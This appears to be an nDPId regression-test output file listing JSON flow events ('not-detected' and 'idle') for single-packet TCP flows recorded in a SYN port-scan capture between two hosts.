+00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1512,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060744,"flow_last_seen":1278275060744,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1000,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1512,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060744,"flow_last_seen":1278275060744,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1000,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":845,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059786,"flow_last_seen":1278275059786,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1001,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":845,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059786,"flow_last_seen":1278275059786,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1001,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":902,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059895,"flow_last_seen":1278275059895,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1001,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
+00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":902,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059895,"flow_last_seen":1278275059895,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1001,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":894,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059852,"flow_last_seen":1278275059852,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1002,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":894,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059852,"flow_last_seen":1278275059852,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1002,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00593{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":58,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275057743,"flow_last_seen":1278275057743,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":3050,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00578{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":58,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275057743,"flow_last_seen":1278275057743,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":3050,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":961,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059961,"flow_last_seen":1278275059961,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1002,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
+00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":961,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059961,"flow_last_seen":1278275059961,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1002,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00593{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":70,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275057885,"flow_last_seen":1278275057885,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":3050,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00578{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":70,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275057885,"flow_last_seen":1278275057885,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":3050,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1136,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060226,"flow_last_seen":1278275060226,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":5100,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1136,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060226,"flow_last_seen":1278275060226,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":5100,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":298,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058596,"flow_last_seen":1278275058596,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":3052,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
+00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":298,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058596,"flow_last_seen":1278275058596,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":3052,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1211,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060336,"flow_last_seen":1278275060336,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":5100,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1211,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060336,"flow_last_seen":1278275060336,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":5100,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":322,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058720,"flow_last_seen":1278275058720,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":3052,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":322,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058720,"flow_last_seen":1278275058720,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":3052,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":136,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058096,"flow_last_seen":1278275058096,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":5101,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
+00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":136,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058096,"flow_last_seen":1278275058096,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":5101,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1026,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060066,"flow_last_seen":1278275060066,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":5102,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1026,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060066,"flow_last_seen":1278275060066,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":5102,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":156,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058220,"flow_last_seen":1278275058220,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":5101,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":156,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058220,"flow_last_seen":1278275058220,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":5101,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1827,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061157,"flow_last_seen":1278275061157,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1007,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
+00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1827,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061157,"flow_last_seen":1278275061157,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1007,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1079,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060175,"flow_last_seen":1278275060175,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":5102,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1079,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060175,"flow_last_seen":1278275060175,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":5102,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1904,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061260,"flow_last_seen":1278275061260,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1007,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1904,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061260,"flow_last_seen":1278275061260,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1007,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":102,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058030,"flow_last_seen":1278275058030,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":9200,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
+00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":102,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058030,"flow_last_seen":1278275058030,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":9200,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":576,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059409,"flow_last_seen":1278275059409,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1009,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":576,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059409,"flow_last_seen":1278275059409,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1009,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":148,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058155,"flow_last_seen":1278275058155,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":9200,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":148,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058155,"flow_last_seen":1278275058155,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":9200,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1095,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060176,"flow_last_seen":1278275060176,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1010,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
+00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1095,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060176,"flow_last_seen":1278275060176,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1010,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":644,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059518,"flow_last_seen":1278275059518,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1009,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":644,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059518,"flow_last_seen":1278275059518,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1009,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1160,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060285,"flow_last_seen":1278275060285,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1010,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1160,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060285,"flow_last_seen":1278275060285,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1010,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1070,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060116,"flow_last_seen":1278275060116,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1011,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
